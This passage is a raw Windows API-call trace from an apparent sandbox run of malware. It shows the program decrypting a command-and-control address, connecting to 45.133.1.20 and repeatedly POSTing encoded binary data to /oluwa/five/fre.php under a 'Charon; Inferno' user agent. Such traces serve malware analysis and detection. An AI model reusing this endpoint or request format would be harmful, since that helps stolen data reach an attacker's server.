(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0296.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.252] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0296.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.253] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0296.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.255] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0296.255] GetProcessHeap () returned 0x6a0000 [0296.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0296.255] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0296.255] GetProcessHeap () returned 0x6a0000 [0296.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0296.256] GetProcessHeap () returned 0x6a0000 [0296.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0296.256] GetProcessHeap () returned 0x6a0000 [0296.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0296.257] GetProcessHeap () returned 0x6a0000 [0296.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0296.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.258] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.268] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0296.275] GetProcessHeap () returned 0x6a0000 [0296.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0296.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.279] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0296.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.280] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.281] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.281] GetProcessHeap () returned 0x6a0000 [0296.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0296.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.283] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0296.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.284] CryptDestroyKey (hKey=0x6ad060) returned 1 [0296.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.285] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0296.285] GetProcessHeap () returned 0x6a0000 [0296.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0296.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.289] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0296.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.291] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0296.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.292] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0296.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.293] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0296.293] GetProcessHeap () returned 0x6a0000 [0296.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0296.293] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0296.294] GetProcessHeap () returned 0x6a0000 [0296.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0296.294] socket (af=2, type=1, protocol=6) returned 0xb18 [0296.294] connect (s=0xb18, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0296.318] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0296.318] GetProcessHeap () returned 0x6a0000 [0296.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0296.318] GetProcessHeap () returned 0x6a0000 [0296.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0296.319] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0296.320] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0296.320] GetProcessHeap () returned 0x6a0000 [0296.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db0c8 [0296.320] GetProcessHeap () returned 0x6a0000 [0296.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0296.322] GetProcessHeap () returned 0x6a0000 [0296.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0296.322] GetProcessHeap () returned 0x6a0000 [0296.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0296.323] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0296.324] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0296.324] GetProcessHeap () returned 0x6a0000 [0296.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0296.324] GetProcessHeap () returned 0x6a0000 [0296.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0296.325] send (s=0xb18, buf=0x6bd460*, len=242, flags=0) returned 242 [0296.325] send (s=0xb18, buf=0x6bb998*, len=159, flags=0) returned 159 [0296.325] GetProcessHeap () returned 0x6a0000 [0296.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0296.325] recv (in: s=0xb18, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0296.396] GetProcessHeap () returned 0x6a0000 [0296.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0296.396] GetProcessHeap () returned 0x6a0000 [0296.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0296.397] GetProcessHeap () returned 0x6a0000 [0296.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db0c8 | out: hHeap=0x6a0000) returned 1 [0296.397] GetProcessHeap () returned 0x6a0000 [0296.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0296.398] closesocket (s=0xb18) returned 0 [0296.399] GetProcessHeap () returned 0x6a0000 [0296.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0296.399] GetProcessHeap () returned 0x6a0000 [0296.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0296.399] GetProcessHeap () returned 0x6a0000 [0296.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0296.400] GetProcessHeap () returned 0x6a0000 [0296.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0296.400] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1838) returned 0xb18 [0296.402] Sleep (dwMilliseconds=0xea60) [0296.405] GetProcessHeap () returned 0x6a0000 [0296.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0296.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.407] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.416] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0296.471] GetProcessHeap () returned 0x6a0000 [0296.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8800 [0296.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.473] CryptImportKey (in: hProv=0x6beb90, pbData=0x6d8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0296.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.475] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.487] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.487] GetProcessHeap () returned 0x6a0000 [0296.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8800 | out: hHeap=0x6a0000) returned 1 [0296.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.499] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0296.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.500] CryptDestroyKey (hKey=0x6ad020) returned 1 [0296.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.501] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0296.501] GetProcessHeap () returned 0x6a0000 [0296.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0296.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.503] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0296.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.504] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0296.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.505] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0296.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.506] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0296.506] GetProcessHeap () returned 0x6a0000 [0296.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0296.506] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0296.506] GetProcessHeap () returned 0x6a0000 [0296.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0296.507] GetProcessHeap () returned 0x6a0000 [0296.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0296.507] GetProcessHeap () returned 0x6a0000 [0296.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0296.508] GetProcessHeap () returned 0x6a0000 [0296.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0296.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.509] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.531] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0296.547] GetProcessHeap () returned 0x6a0000 [0296.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0296.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.548] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0296.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.553] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.557] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.558] GetProcessHeap () returned 0x6a0000 [0296.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0296.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.559] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0296.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.561] CryptDestroyKey (hKey=0x6ad020) returned 1 [0296.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.562] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0296.562] GetProcessHeap () returned 0x6a0000 [0296.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0296.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.565] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0296.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.567] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0296.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.568] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0296.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.569] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0296.569] GetProcessHeap () returned 0x6a0000 [0296.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0296.569] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0296.569] GetProcessHeap () returned 0x6a0000 [0296.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0296.569] socket (af=2, type=1, protocol=6) returned 0xb1c [0296.570] connect (s=0xb1c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0296.600] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0296.600] GetProcessHeap () returned 0x6a0000 [0296.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0296.600] GetProcessHeap () returned 0x6a0000 [0296.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0296.601] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0296.602] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0296.602] GetProcessHeap () returned 0x6a0000 [0296.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dadc8 [0296.602] GetProcessHeap () returned 0x6a0000 [0296.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0296.603] GetProcessHeap () returned 0x6a0000 [0296.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0296.603] GetProcessHeap () returned 0x6a0000 [0296.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0296.604] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0296.605] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0296.605] GetProcessHeap () returned 0x6a0000 [0296.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0296.605] GetProcessHeap () returned 0x6a0000 [0296.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0296.606] send (s=0xb1c, buf=0x6bd460*, len=242, flags=0) returned 242 [0296.606] send (s=0xb1c, buf=0x6bb998*, len=159, flags=0) returned 159 [0296.606] GetProcessHeap () returned 0x6a0000 [0296.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0296.606] recv (in: s=0xb1c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0296.672] GetProcessHeap () returned 0x6a0000 [0296.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0296.672] GetProcessHeap () returned 0x6a0000 [0296.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0296.673] GetProcessHeap () returned 0x6a0000 [0296.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dadc8 | out: hHeap=0x6a0000) returned 1 [0296.675] GetProcessHeap () returned 0x6a0000 [0296.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0296.675] closesocket (s=0xb1c) returned 0 [0296.676] GetProcessHeap () returned 0x6a0000 [0296.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0296.676] GetProcessHeap () returned 0x6a0000 [0296.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0296.678] GetProcessHeap () returned 0x6a0000 [0296.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0296.678] GetProcessHeap () returned 0x6a0000 [0296.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0296.679] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1840) returned 0xb1c [0296.681] Sleep (dwMilliseconds=0xea60) [0296.682] GetProcessHeap () returned 0x6a0000 [0296.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0296.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.684] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.690] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0296.697] GetProcessHeap () returned 0x6a0000 [0296.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0296.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.701] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0296.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.702] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.704] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.704] GetProcessHeap () returned 0x6a0000 [0296.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0296.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.705] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0296.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.706] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0296.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.708] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0296.708] GetProcessHeap () returned 0x6a0000 [0296.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0296.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.712] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0296.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.713] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0296.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.723] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0296.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.725] StrStrA 